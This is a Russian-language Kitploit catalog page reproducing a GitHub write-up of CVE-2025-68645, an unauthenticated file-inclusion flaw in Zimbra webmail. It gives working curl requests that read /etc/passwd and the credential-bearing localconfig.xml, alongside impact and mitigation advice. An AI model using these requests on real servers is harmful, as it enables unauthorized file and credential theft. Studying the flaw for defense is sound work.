Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-68645 — CVE-2025-68645 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2025-68645
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHub0xblackash/cve-2025-68645

CVE-2025-68645

CVE-2025-68645

Репозиторий
213 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ CVE-2025-68645 - Анализ уязвимости Local File Inclusion (LFI) в Zimbra

zimbra

Vulnerability Target Severity Status


📌 Обзор

В этом документе описывается уязвимость Local File Inclusion (LFI), затрагивающая Zimbra Collaboration Suite.

Проблема возникает из-за неправильной обработки следующего параметра:

root@kitploit:~
/h/*?javax.servlet.include.servlet_path=

Это позволяет неаутентифицированному пользователю получать доступ к внутренним ресурсам приложения.


🔍 Детали уязвимости

  • Тип: Local File Inclusion (LFI)
  • Доступ: Неаутентифицированный
  • Затронутый компонент: Webmail (Classic UI)
  • Вектор атаки: Манипуляция HTTP-запросами

🧪 Первоначальная проверка

Тестовый запрос:

root@kitploit:~
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

▶️ Демонстрация:

cve-2025-68645 cve-2025-68645 1

✅ Результат

  • Внутренний файл успешно получен
  • Подтверждает неправильную обработку входных данных

⚙️ Поведение конечных точек

Несколько конечных точек обрабатывают уязвимый параметр по-разному.

Пример:

root@kitploit:~
/h/printcalendar?javax.servlet.include.servlet_path=...

Наблюдения:

  • Более стабильное поведение доступа к файлам
  • Лучшая надежность ответа по сравнению с /h/rest

🚧 Соображения по TLS

Проблема

root@kitploit:~
SSL: certificate subject name does not match target host

Обходной путь

root@kitploit:~
curl -k "https://TARGET/..."

🚀 Примеры эксплуатации

📂 Доступ к внутреннему веб-ресурсу

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

📂 Попытка доступа к системному файлу

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"

🔐 Доступ к конфигурации приложения

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"

Возможные утечки:

  • Учетные данные служб
  • Внутренняя конфигурация
  • Детали инфраструктуры

🧠 Воздействие

Успешная эксплуатация может привести к:

  • Раскрытию конфиденциальных конфигурационных файлов
  • Раскрытию внутренних служб и архитектуры
  • Утечке учетных данных
  • Повышению риска дальнейшей компрометации

🛡️ Меры по смягчению

  • Обновить Zimbra до исправленных версий

  • Ограничить доступ к уязвимым конечным точкам

  • Отслеживать логи на наличие подозрительных параметров:

    • javax.servlet.include.servlet_path
  • Развернуть правила WAF для блокировки вредоносных шаблонов


💡 Ключевые выводы

  • Ошибки проверки входных данных могут раскрыть внутренние ресурсы
  • Разные конечные точки могут вести себя непоследовательно
  • Конфигурационные файлы часто содержат критически важную информацию
  • Раннее обнаружение значительно снижает риск

🏴 Заключение

  • Уязвимость подтверждена: CVE-2025-68645
  • Эксплуатация позволяет несанкционированный доступ к файлам
  • Настоятельно рекомендуется немедленное устранение

🔐 Безопасность имеет значение

Скачать инструмент